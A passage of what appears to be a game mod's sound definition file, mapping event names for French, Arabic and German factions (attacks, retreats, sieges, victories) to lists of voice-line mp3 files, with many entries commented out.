["French_General_Attacking_1.mp3","French_Army_Attacking_2.mp3","French_Army_Fight_On_Battle_Map_1.mp3","French_Army_Fight_On_Battle_Map_3.mp3","French_Army_Fight_On_Battle_Map_5.mp3","French_General_Attacking_2.mp3","French_General_Attacking_3.mp3","French_General_Attacking_Chivalry_1.mp3","French_General_Attacking_Chivalry_2.mp3","French_General_Attacking_Dread_1.mp3","French_General_Attacking_Dread_3.mp3","French_General_Fight_On_Battle_Map_3.mp3","French_General_Fight_On_Battle_Map_Chivalry_1.mp3","French_General_Fight_On_Battle_Map_Dread_1.mp3","French_General_Fight_On_Battle_Map_Dread_2.mp3","French_General_Fight_On_Battle_Map_Dread_3.mp3","French_General_Fight_On_Battle_Map_1.mp3", "French_Army_Fight_On_Battle_Map_4.mp3","French_Army_Fight_On_Battle_Map_6.mp3", "French_General_Attacking_Chivalry_3.mp3", "French_General_Fight_On_Battle_Map_2.mp3","French_General_Fight_On_Battle_Map_Chivalry_2.mp3", "French_General_Fight_On_Battle_Map_Chivalry_3.mp3"]), ("frenchfg_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Battle_lost_retreat_1.mp3","French_Army_Battle_lost_retreat_2.mp3","French_General_Battle_lost_retreat_1.mp3","French_General_Battle_lost_retreat_2.mp3","French_General_Battle_lost_retreat_Chivalry_1.mp3","French_General_Battle_lost_retreat_Chivalry_2.mp3","French_General_Battle_lost_retreat_Chivalry_3.mp3","French_General_Battle_lost_retreat_Dread_1.mp3","French_General_Battle_lost_retreat_Dread_2.mp3","French_General_Battle_lost_retreat_Dread_3.mp3"]), ("frenchfg_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["French_General_Battle_won_3.mp3","French_General_Battle_won_Chivalry_1.mp3","French_General_Battle_won_Chivalry_3.mp3","French_General_Battle_won_Dread_1.mp3","French_General_Battle_won_Dread_2.mp3","French_General_Battle_won_Dread_3.mp3","French_General_Battle_won_1.mp3","French_General_Battle_won_Chivalry_2.mp3"]), ("frenchfg_army_join", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Joins_Army_1.mp3","French_Army_Joins_Army_2.mp3","French_Army_Joins_Army_3.mp3","French_General_Joins_Army_1.mp3","French_General_Joins_Army_3.mp3","French_General_Joins_Army_Chivalry_3.mp3","French_General_Joins_Army_Dread_1.mp3","French_General_Joins_Army_Dread_2.mp3","French_General_Joins_Army_Dread_3.mp3"]), ("frenchfg_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Leaves_Army_1.mp3","French_Army_Leaves_Army_2.mp3","French_General_Leaves_Army_1.mp3","French_General_Leaves_Army_2.mp3","French_General_Leaves_Army_3.mp3","French_General_Leaves_Army_Chivalry_1.mp3","French_General_Leaves_Army_Chivalry_2.mp3","French_General_Leaves_Army_Dread_1.mp3","French_General_Leaves_Army_Dread_2.mp3", "French_General_Leaves_Army_Dread_3.mp3"]), ("frenchfg_capture", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Settlement_Capture_Celebration_3.mp3","French_General_Settlement_Capture_Celebration_3.mp3","French_General_Settlement_Capture_Celebration_Dread_1.mp3","French_General_Settlement_Capture_Celebration_Dread_3.mp3","French_Army_Settlement_Capture_Celebration_1.mp3","French_General_Settlement_Capture_Celebration_1.mp3","French_General_Settlement_Capture_Celebration_Chivalry_1.mp3","French_General_Settlement_Capture_Celebration_Chivalry_3.mp3"]), ("frenchfg_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Begun_2.mp3","French_General_siege_Begun_1.mp3","French_General_siege_Begun_2.mp3","French_General_siege_Begun_Dread_2.mp3","French_General_siege_Begun_Chivalry_2.mp3"]), ("frenchfg_besieged", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Besieged_1.mp3","French_Army_siege_Besieged_2.mp3","French_General_siege_Besieged_1.mp3","French_General_siege_Besieged_2.mp3","French_General_siege_Besieged_Chivalry_1.mp3","French_General_siege_Besieged_Dread_1.mp3","French_General_siege_Besieged_Dread_2.mp3","French_General_siege_Besieged_Dread_3.mp3","French_General_siege_Besieged_Chivalry_3.mp3"]), ("frenchfg_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Ongoing_1.mp3","French_Army_siege_Ongoing_3.mp3","French_General_siege_Ongoing_1.mp3","French_General_siege_Ongoing_2.mp3","French_General_siege_Ongoing_Chivalry_3.mp3","French_General_siege_Ongoing_Dread_2.mp3","French_General_siege_Ongoing_Dread_3.mp3"]), #French #("fac_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["nss1.mp3","nss2.mp3","nss3.mp3"]), #("fac_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["nss1.mp3","nss2.mp3","nss3.mp3"]), #("fac_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["nss1.mp3","nss2.mp3","nss3.mp3","nss4.mp3","nss5.mp3","nss6.mp3","nss7.mp3","nss8.mp3","nss9.mp3","nss10.mp3","nss11.mp3","nss12.mp3","nss13.mp3","nss14.mp3","nss15.mp3","nss16.mp3"]), #("fac_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["nss1.mp3","nss2.mp3","nss3.mp3","nss4.mp3","nss5.mp3","nss6.mp3","nss7.mp3","nss8.mp3","nss9.mp3","nss10.mp3","nss11.mp3","nss12.mp3","nss13.mp3","nss14.mp3","nss15.mp3","nss16.mp3","nss17.mp3","nss18.mp3","nss19.mp3","nss20.mp3"]), #("fac_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["nss1.mp3","nss2.mp3","nss3.mp3","nss4.mp3","nss5.mp3","nss6.mp3","nss7.mp3","nss8.mp3","nss9.mp3","nss10.mp3","nss11.mp3","nss12.mp3"]), #("fac_army_join", sf_2d|sf_priority_10|sf_vol_7, ["nss1.mp3","nss2.mp3","nss3.mp3","nss4.mp3","nss5.mp3","nss6.mp3","nss7.mp3","nss8.mp3","nss9.mp3","nss10.mp3","nss11.mp3","nss12.mp3"]), #("fac_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["nss1.mp3","nss2.mp3","nss3.mp3","nss4.mp3","nss5.mp3","nss6.mp3","nss7.mp3","nss8.mp3","nss9.mp3"]), #("fac_capture", sf_2d|sf_priority_10|sf_vol_7, ["nss1.mp3","nss2.mp3","nss3.mp3","nss4.mp3","nss5.mp3","nss6.mp3","nss7.mp3","nss8.mp3","nss9.mp3","nss10.mp3","nss11.mp3"]), #("fac_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["nss1.mp3","nss2.mp3","nss3.mp3","nss4.mp3","nss5.mp3","nss6.mp3","nss7.mp3","nss8.mp3"]), #("fac_besieged", sf_2d|sf_priority_10|sf_vol_7, ["nss1.mp3","nss2.mp3","nss3.mp3","nss4.mp3","nss5.mp3","nss6.mp3","nss7.mp3","nss8.mp3","nss9.mp3","nss10.mp3","nss11.mp3","nss12.mp3"]), #("fac_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["nss1.mp3","nss2.mp3","nss3.mp3","nss4.mp3","nss5.mp3","nss6.mp3","nss7.mp3","nss8.mp3","nss9.mp3","nss10.mp3","nss11.mp3","nss12.mp3"]), #########Generic King #Islamics ("arabick_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Admiral_Attacked_Enemy_1.mp3","Arabic_Admiral_Attacked_Enemy_3.mp3","Arabic_Admiral_Attacked_Enemy_2.mp3"]), ("arabick_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Admiral_Attacking_1.mp3","Arabic_Admiral_Attacking_2.mp3","Arabic_Admiral_Attacking_3.mp3"]), ("arabick_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Attacking_1.mp3","Arabic_Army_Attacking_2.mp3","Arabic_Army_Attacking_3.mp3","Arabic_Army_Fight_On_Battle_Map_1.mp3","Arabic_Army_Fight_On_Battle_Map_2.mp3","Arabic_Army_Fight_On_Battle_Map_3.mp3","Arabic_Army_Fight_On_Battle_Map_4.mp3","Arabic_Army_Fight_On_Battle_Map_5.mp3","Arabic_Army_Fight_On_Battle_Map_6.mp3","Arabic_General_Attacking_2.mp3","Arabic_General_Attacking_3.mp3","Arabic_General_Attacking_Chivalry_1.mp3","Arabic_General_Attacking_Chivalry_3.mp3","Arabic_General_Attacking_Dread_1.mp3","Arabic_General_Attacking_Dread_2.mp3","Arabic_General_Fight_On_Battle_Map_1.mp3","Arabic_General_Fight_On_Battle_Map_2.mp3","Arabic_General_Fight_On_Battle_Map_3.mp3","Arabic_General_Fight_On_Battle_Map_Chivalry_1.mp3","Arabic_General_Fight_On_Battle_Map_Chivalry_2.mp3","Arabic_General_Fight_On_Battle_Map_Chivalry_3.mp3","Arabic_General_Fight_On_Battle_Map_3.mp3","Arabic_General_Fight_On_Battle_Map_Dread_1.mp3","Arabic_General_Fight_On_Battle_Map_Dread_2.mp3","Arabic_General_Fight_On_Battle_Map_Dread_3.mp3","Arabic_General_Attacking_1.mp3","Arabic_General_Attacking_Chivalry_2.mp3","Arabic_General_Attacking_Dread_3.mp3"]), ("arabick_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Battle_lost_retreat_1.mp3","Arabic_Army_Battle_lost_retreat_2.mp3","Arabic_Army_Battle_lost_retreat_3.mp3","Arabic_General_Battle_lost_retreat_1.mp3","Arabic_General_Battle_lost_retreat_2.mp3","Arabic_General_Battle_lost_retreat_3.mp3","Arabic_General_Battle_lost_retreat_Chivalry_1.mp3","Arabic_General_Battle_lost_retreat_Chivalry_2.mp3","Arabic_General_Battle_lost_retreat_Chivalry_3.mp3","Arabic_General_Battle_lost_retreat_Dread_1.mp3","Arabic_General_Battle_lost_retreat_Dread_2.mp3","Arabic_General_Battle_lost_retreat_Dread_3.mp3"]), ("arabick_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Battle_won_1.mp3","Arabic_Army_Battle_won_2.mp3","Arabic_General_Battle_won_1.mp3","Arabic_General_Battle_won_2.mp3","Arabic_General_Battle_won_3.mp3","Arabic_General_Battle_won_Chivalry_1.mp3","Arabic_General_Battle_won_Chivalry_2.mp3","Arabic_General_Battle_won_Chivalry_3.mp3","Arabic_General_Battle_won_Dread_2.mp3","Arabic_Army_Battle_won_3.mp3","Arabic_General_Battle_won_Dread_1.mp3","Arabic_General_Battle_won_Dread_3.mp3"]), ("arabick_army_join", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Joins_Army_1.mp3","Arabic_Army_Joins_Army_2.mp3","Arabic_General_Joins_Army_1.mp3","Arabic_General_Joins_Army_2.mp3","Arabic_General_Joins_Army_Chivalry_2.mp3","Arabic_General_Joins_Army_Chivalry_3.mp3","Arabic_General_Joins_Army_Dread_2.mp3","Arabic_Army_Joins_Army_3.mp3" ,"Arabic_General_Joins_Army_3.mp3","Arabic_General_Joins_Army_Chivalry_1.mp3","Arabic_General_Joins_Army_Dread_1.mp3","Arabic_General_Joins_Army_Dread_3.mp3"]), ("arabick_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Leaves_Army_1.mp3","Arabic_Army_Leaves_Army_2.mp3","Arabic_General_Leaves_Army_1.mp3","Arabic_General_Leaves_Army_2.mp3","Arabic_General_Leaves_Army_Dread_1.mp3","Arabic_General_Leaves_Army_Dread_3.mp3","Arabic_Army_Leaves_Army_3.mp3","Arabic_General_Leaves_Army_3.mp3","Arabic_General_Leaves_Army_Chivalry_1.mp3" ,"Arabic_General_Leaves_Army_Chivalry_2.mp3","Arabic_General_Leaves_Army_Chivalry_3.mp3","Arabic_General_Leaves_Army_Dread_2.mp3"]), ("arabick_capture", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Settlement_Capture_Celebration_2.mp3","Arabic_Army_Settlement_Capture_Celebration_3.mp3","Arabic_General_Settlement_Capture_Celebration_2.mp3","Arabic_General_Settlement_Capture_Celebration_3.mp3","Arabic_General_Settlement_Capture_Celebration_Chivalry_1.mp3","Arabic_General_Settlement_Capture_Celebration_Chivalry_2.mp3","Arabic_General_Settlement_Capture_Celebration_Chivalry_3.mp3","Arabic_General_Settlement_Capture_Celebration_Dread_3.mp3","Arabic_Army_Settlement_Capture_Celebration_1.mp3","Arabic_General_Settlement_Capture_Celebration_1.mp3","Arabic_General_Settlement_Capture_Celebration_Dread_1.mp3","Arabic_General_Settlement_Capture_Celebration_Dread_2.mp3"]), ("arabick_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_siege_Begun_2.mp3","Arabic_General_siege_Begun_2.mp3","Arabic_General_siege_Begun_Chivalry_1.mp3","Arabic_General_siege_Begun_Chivalry_2.mp3","Arabic_Army_siege_Begun_1.mp3","Arabic_General_siege_Begun_1.mp3","Arabic_General_siege_Begun_Dread_1.mp3","Arabic_General_siege_Begun_Dread_2.mp3"]), ("arabick_besieged", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_siege_Ongoing_1.mp3","Arabic_General_siege_Besieged_Chivalry_1.mp3","Arabic_General_siege_Besieged_Chivalry_2.mp3","Arabic_General_siege_Besieged_Dread_1.mp3","Arabic_General_siege_Besieged_Dread_2.mp3","Arabic_Army_siege_Besieged_1.mp3","Arabic_Army_siege_Besieged_2.mp3","Arabic_Army_siege_Besieged_3.mp3","Arabic_General_siege_Besieged_1.mp3","Arabic_General_siege_Besieged_2.mp3","Arabic_General_siege_Besieged_3.mp3","Arabic_General_siege_Besieged_Chivalry_3.mp3","Arabic_General_siege_Besieged_Dread_3.mp3"]), ("arabick_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_General_siege_Ongoing_1.mp3","Arabic_Army_siege_Ongoing_2.mp3","Arabic_Army_siege_Ongoing_3.mp3","Arabic_General_siege_Ongoing_2.mp3","Arabic_General_siege_Ongoing_3.mp3","Arabic_General_siege_Ongoing_Chivalry_1.mp3","Arabic_General_siege_Ongoing_Chivalry_2.mp3","Arabic_General_siege_Ongoing_Chivalry_3.mp3","Arabic_General_siege_Ongoing_Dread_1.mp3","Arabic_General_siege_Ongoing_Dread_2.mp3","Arabic_General_siege_Ongoing_Dread_3.mp3"]), #Islamics #French ("frenchk_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["French_Admiral_Attacked_Enemy_2.mp3","French_Admiral_Attacked_Enemy_3.mp3","French_Admiral_Attacked_Enemy_1.mp3"]), ("frenchk_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["French_Admiral_Attacking_1.mp3","French_Admiral_Attacking_2.mp3","French_Admiral_Attacking_3.mp3"]), ("frenchk_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Attacking_2.mp3","French_Army_Fight_On_Battle_Map_3.mp3","French_Army_Fight_On_Battle_Map_5.mp3","French_General_Attacking_2.mp3","French_General_Attacking_3.mp3","French_General_Attacking_Chivalry_1.mp3","French_General_Attacking_Chivalry_2.mp3","French_General_Attacking_Dread_1.mp3","French_General_Attacking_Dread_3.mp3","French_General_Fight_On_Battle_Map_3.mp3","French_General_Fight_On_Battle_Map_Chivalry_1.mp3","French_General_Fight_On_Battle_Map_Dread_1.mp3","French_General_Fight_On_Battle_Map_Dread_2.mp3","French_General_Fight_On_Battle_Map_Dread_3.mp3","French_Army_Attacking_1.mp3","French_Army_Attacking_3.mp3"]), ("frenchk_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Battle_lost_retreat_1.mp3","French_Army_Battle_lost_retreat_2.mp3","French_General_Battle_lost_retreat_1.mp3","French_General_Battle_lost_retreat_2.mp3","French_General_Battle_lost_retreat_Chivalry_1.mp3","French_General_Battle_lost_retreat_Chivalry_2.mp3","French_General_Battle_lost_retreat_Chivalry_3.mp3","French_General_Battle_lost_retreat_Dread_1.mp3","French_General_Battle_lost_retreat_Dread_2.mp3","French_General_Battle_lost_retreat_Dread_3.mp3","French_Army_Battle_lost_retreat_3.mp3","French_General_Battle_lost_retreat_3.mp3"]), ("frenchk_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["French_General_Battle_won_3.mp3","French_General_Battle_won_Chivalry_1.mp3","French_General_Battle_won_Chivalry_3.mp3","French_General_Battle_won_Dread_1.mp3","French_General_Battle_won_Dread_2.mp3","French_General_Battle_won_Dread_3.mp3","French_Army_Battle_won_1.mp3","French_General_Battle_won_2.mp3"]), ("frenchk_army_join", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Joins_Army_1.mp3","French_Army_Joins_Army_2.mp3","French_Army_Joins_Army_3.mp3","French_General_Joins_Army_1.mp3","French_General_Joins_Army_3.mp3","French_General_Joins_Army_Chivalry_3.mp3","French_General_Joins_Army_Dread_1.mp3","French_General_Joins_Army_Dread_2.mp3","French_General_Joins_Army_Dread_3.mp3","French_General_Joins_Army_2.mp3","French_General_Joins_Army_Chivalry_1.mp3"]), ("frenchk_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Leaves_Army_1.mp3","French_Army_Leaves_Army_2.mp3","French_General_Leaves_Army_1.mp3","French_General_Leaves_Army_2.mp3","French_General_Leaves_Army_3.mp3","French_General_Leaves_Army_Chivalry_1.mp3","French_General_Leaves_Army_Chivalry_2.mp3","French_General_Leaves_Army_Dread_1.mp3","French_General_Leaves_Army_Dread_2.mp3", "French_General_Leaves_Army_Dread_3.mp3", "French_Army_Leaves_Army_3.mp3", "French_General_Leaves_Army_Chivalry_3.mp3"]), ("frenchk_capture", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Settlement_Capture_Celebration_3.mp3","French_General_Settlement_Capture_Celebration_3.mp3","French_General_Settlement_Capture_Celebration_Dread_1.mp3","French_General_Settlement_Capture_Celebration_Dread_3.mp3","French_Army_Settlement_Capture_Celebration_2.mp3","French_General_Settlement_Capture_Celebration_2.mp3","French_General_Settlement_Capture_Celebration_Chivalry_2.mp3","French_General_Settlement_Capture_Celebration_Dread_2.mp3"]), ("frenchk_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Begun_2.mp3","French_General_siege_Begun_1.mp3","French_General_siege_Begun_2.mp3","French_General_siege_Begun_Dread_2.mp3","French_Army_siege_Begun_1.mp3","French_General_siege_Begun_Chivalry_1.mp3","French_General_siege_Begun_Dread_1.mp3"]), ("frenchk_besieged", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Besieged_1.mp3","French_Army_siege_Besieged_2.mp3","French_General_siege_Besieged_1.mp3","French_General_siege_Besieged_2.mp3","French_General_siege_Besieged_Chivalry_1.mp3","French_General_siege_Besieged_Dread_1.mp3","French_General_siege_Besieged_Dread_2.mp3","French_General_siege_Besieged_Dread_3.mp3","French_Army_siege_Besieged_3.mp3","French_General_siege_Besieged_3.mp3","French_General_siege_Besieged_Chivalry_2.mp3"]), ("frenchk_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Ongoing_1.mp3","French_Army_siege_Ongoing_3.mp3","French_General_siege_Ongoing_1.mp3","French_General_siege_Ongoing_2.mp3","French_General_siege_Ongoing_Chivalry_3.mp3","French_General_siege_Ongoing_Dread_2.mp3","French_General_siege_Ongoing_Dread_3.mp3","French_Army_siege_Ongoing_2.mp3","French_General_siege_Ongoing_3.mp3","French_General_siege_Ongoing_Chivalry_1.mp3","French_General_siege_Ongoing_Chivalry_2.mp3","French_General_siege_Ongoing_Dread_1.mp3"]), #French #New factional ##German #("germanfk_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["German_Admiral_Attacked_Enemy_2.mp3","German_Admiral_Attacked_Enemy_1.mp3","German_Admiral_Attacked_Enemy_3.mp3"]), #("germanfk_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["German_Admiral_Attacking_2.mp3","German_Admiral_Attacking_1.mp3","German_Admiral_Attacking_3.mp3"]), #("germanfk_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Attacking_2.mp3","German_Army_Fight_On_Battle_Map_1.mp3","German_Army_Fight_On_Battle_Map_2.mp3","German_Army_Fight_On_Battle_Map_3.mp3","German_Army_Fight_On_Battle_Map_4.mp3","German_Army_Fight_On_Battle_Map_5.mp3","German_General_Attacking_2.mp3","German_General_Attacking_Chivalry_2.mp3","German_General_Attacking_Dread_1.mp3","German_General_Fight_On_Battle_Map_1.mp3","German_General_Fight_On_Battle_Map_2.mp3","German_General_Fight_On_Battle_Map_3.mp3","German_General_Fight_On_Battle_Map_Chivalry_1.mp3","German_General_Fight_On_Battle_Map_Chivalry_2.mp3","German_General_Fight_On_Battle_Map_Chivalry_3.mp3","German_General_Fight_On_Battle_Map_Dread_1.mp3","German_General_Fight_On_Battle_Map_Dread_2.mp3","German_General_Fight_On_Battle_Map_Dread_3.mp3","German_Army_Attacking_1.mp3","German_Army_Attacking_3.mp3","German_Army_Fight_On_Battle_Map_6.mp3","German_General_Attacking_1.mp3","German_General_Attacking_3.mp3","German_General_Attacking_Chivalry_1.mp3","German_General_Attacking_Chivalry_3.mp3","German_General_Attacking_Dread_2.mp3","German_General_Attacking_Dread_3.mp3"]), #("germanfk_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Battle_lost_retreat_1.mp3","German_Army_Battle_lost_retreat_2.mp3","German_Army_Battle_lost_retreat_3.mp3","German_General_Battle_lost_retreat_1.mp3","German_General_Battle_lost_retreat_2.mp3","German_General_Battle_lost_retreat_3.mp3","German_General_Battle_lost_retreat_Chivalry_1.mp3","German_General_Battle_lost_retreat_Chivalry_2.mp3","German_General_Battle_lost_retreat_Chivalry_3.mp3","German_General_Battle_lost_retreat_Dread_1.mp3","German_General_Battle_lost_retreat_Dread_2.mp3","German_General_Battle_lost_retreat_Dread_3.mp3"]), #("germanfk_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Battle_won_2.mp3","German_Army_Battle_won_3.mp3","German_General_Battle_won_2.mp3","German_General_Battle_won_3.mp3","German_General_Battle_won_Chivalry_2.mp3","German_General_Battle_won_Chivalry_3.mp3","German_General_Battle_won_Dread_1.mp3","German_General_Battle_won_Dread_3.mp3","German_Army_Battle_won_1.mp3","German_General_Battle_won_1.mp3","German_General_Battle_won_Chivalry_1.mp3","German_General_Battle_won_Dread_2.mp3"]), #("germanfk_army_join", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Joins_Army_2.mp3","German_General_Joins_Army_2.mp3","German_General_Joins_Army_Dread_2.mp3","German_Army_Joins_Army_1.mp3","German_Army_Joins_Army_3.mp3","German_General_Joins_Army_1.mp3","German_General_Joins_Army_3.mp3","German_General_Joins_Army_Chivalry_1.mp3","German_General_Joins_Army_Chivalry_2.mp3","German_General_Joins_Army_Chivalry_3.mp3","German_General_Joins_Army_Dread_1.mp3","German_General_Joins_Army_Dread_3.mp3"]), #("germanfk_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Leaves_Army_3.mp3","German_General_Leaves_Army_3.mp3","German_General_Leaves_Army_Chivalry_1.mp3","German_General_Leaves_Army_Dread_2.mp3","German_General_Leaves_Army_Dread_3.mp3","German_Army_Leaves_Army_1.mp3","German_Army_Leaves_Army_2.mp3","German_General_Leaves_Army_1.mp3","German_General_Leaves_Army_2.mp3","German_General_Leaves_Army_Chivalry_2.mp3","German_General_Leaves_Army_Chivalry_3.mp3","German_General_Leaves_Army_Dread_1.mp3"]), #("germanfk_capture", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Settlement_Capture_Celebration_1.mp3","German_Army_Settlement_Capture_Celebration_3.mp3","German_General_Settlement_Capture_Celebration_Chivalry_1.mp3","German_General_Settlement_Capture_Celebration_Chivalry_3.mp3","German_General_Settlement_Capture_Celebration_Dread_1.mp3","German_General_Settlement_Capture_Celebration_Dread_2.mp3","German_Army_Settlement_Capture_Celebration_2.mp3","German_General_Settlement_Capture_Celebration_1.mp3","German_General_Settlement_Capture_Celebration_2.mp3","German_General_Settlement_Capture_Celebration_3.mp3","German_General_Settlement_Capture_Celebration_Chivalry_2.mp3","German_General_Settlement_Capture_Celebration_Dread_3.mp3"]), #("germanfk_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["German_General_siege_Begun_Dread_1.mp3", "German_General_siege_Begun_Dread_2.mp3","German_Army_siege_Begun_1.mp3","German_Army_siege_Begun_2.mp3","German_General_siege_Begun_1.mp3","German_General_siege_Begun_2.mp3","German_General_siege_Begun_Chivalry_1.mp3","German_General_siege_Begun_Chivalry_2.mp3"]), #("germanfk_besieged", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_siege_Besieged_3.mp3","German_General_siege_Besieged_3.mp3","German_General_siege_Besieged_Chivalry_1.mp3","German_General_siege_Besieged_Chivalry_2.mp3","German_General_siege_Besieged_Dread_1.mp3","German_General_siege_Besieged_Dread_3.mp3","German_Army_siege_Besieged_1.mp3","German_Army_siege_Besieged_2.mp3","German_General_siege_Besieged_1.mp3","German_General_siege_Besieged_2.mp3","German_General_siege_Besieged_Chivalry_3.mp3","German_General_siege_Besieged_Dread_2.mp3"]), #("germanfk_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["German_General_siege_Ongoing_Dread_2.mp3","German_General_siege_Ongoing_Dread_3.mp3","German_Army_siege_Ongoing_1.mp3","German_Army_siege_Ongoing_2.mp3","German_Army_siege_Ongoing_3.mp3","German_General_siege_Ongoing_1.mp3","German_General_siege_Ongoing_2.mp3","German_General_siege_Ongoing_3.mp3","German_General_siege_Ongoing_Chivalry_1.mp3","German_General_siege_Ongoing_Chivalry_2.mp3","German_General_siege_Ongoing_Chivalry_3.mp3","German_General_siege_Ongoing_Dread_1.mp3"]), ##German # ##German #("germanfg_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["German_Admiral_Attacked_Enemy_2.mp3"]), #("germanfg_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["German_Admiral_Attacking_2.mp3"]), #("germanfg_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Attacking_2.mp3","German_Army_Fight_On_Battle_Map_1.mp3","German_Army_Fight_On_Battle_Map_2.mp3","German_Army_Fight_On_Battle_Map_3.mp3","German_Army_Fight_On_Battle_Map_4.mp3","German_Army_Fight_On_Battle_Map_5.mp3","German_General_Attacking_2.mp3","German_General_Attacking_Chivalry_2.mp3","German_General_Attacking_Dread_1.mp3","German_General_Fight_On_Battle_Map_1.mp3","German_General_Fight_On_Battle_Map_2.mp3","German_General_Fight_On_Battle_Map_3.mp3","German_General_Fight_On_Battle_Map_Chivalry_1.mp3","German_General_Fight_On_Battle_Map_Chivalry_2.mp3","German_General_Fight_On_Battle_Map_Chivalry_3.mp3","German_General_Fight_On_Battle_Map_Dread_1.mp3","German_General_Fight_On_Battle_Map_Dread_2.mp3","German_General_Fight_On_Battle_Map_Dread_3.mp3"]), #("germanfg_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Battle_lost_retreat_1.mp3","German_Army_Battle_lost_retreat_2.mp3","German_Army_Battle_lost_retreat_3.mp3","German_General_Battle_lost_retreat_1.mp3","German_General_Battle_lost_retreat_2.mp3","German_General_Battle_lost_retreat_3.mp3","German_General_Battle_lost_retreat_Chivalry_1.mp3","German_General_Battle_lost_retreat_Chivalry_2.mp3","German_General_Battle_lost_retreat_Chivalry_3.mp3","German_General_Battle_lost_retreat_Dread_1.mp3","German_General_Battle_lost_retreat_Dread_2.mp3","German_General_Battle_lost_retreat_Dread_3.mp3"]), #("germanfg_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Battle_won_2.mp3","German_Army_Battle_won_3.mp3","German_General_Battle_won_2.mp3","German_General_Battle_won_3.mp3","German_General_Battle_won_Chivalry_2.mp3","German_General_Battle_won_Chivalry_3.mp3","German_General_Battle_won_Dread_1.mp3","German_General_Battle_won_Dread_3.mp3"]), #("germanfg_army_join", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Joins_Army_2.mp3","German_General_Joins_Army_2.mp3","German_General_Joins_Army_Dread_2.mp3"]), #("germanfg_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Leaves_Army_3.mp3","German_General_Leaves_Army_3.mp3","German_General_Leaves_Army_Chivalry_1.mp3","German_General_Leaves_Army_Dread_2.mp3","German_General_Leaves_Army_Dread_3.mp3"]), #("germanfg_capture", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Settlement_Capture_Celebration_1.mp3","German_Army_Settlement_Capture_Celebration_3.mp3","German_General_Settlement_Capture_Celebration_Chivalry_1.mp3","German_General_Settlement_Capture_Celebration_Chivalry_3.mp3","German_General_Settlement_Capture_Celebration_Dread_1.mp3","German_General_Settlement_Capture_Celebration_Dread_2.mp3"]), #("germanfg_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["German_General_siege_Begun_Dread_1.mp3","German_General_siege_Begun_Dread_2.mp3"]), #("germanfg_besieged", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_siege_Besieged_3.mp3","German_General_siege_Besieged_3.mp3","German_General_siege_Besieged_Chivalry_1.mp3","German_General_siege_Besieged_Chivalry_2.mp3","German_General_siege_Besieged_Dread_1.mp3","German_General_siege_Besieged_Dread_3.mp3"]), #("germanfg_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["German_General_siege_Ongoing_Dread_2.mp3","German_General_siege_Ongoing_Dread_3.mp3"]), ##German #END FACTIONAL #German ("germank_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["German_Admiral_Attacked_Enemy_2.mp3","German_Admiral_Attacked_Enemy_1.mp3","German_Admiral_Attacked_Enemy_3.mp3"]), ("germank_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, 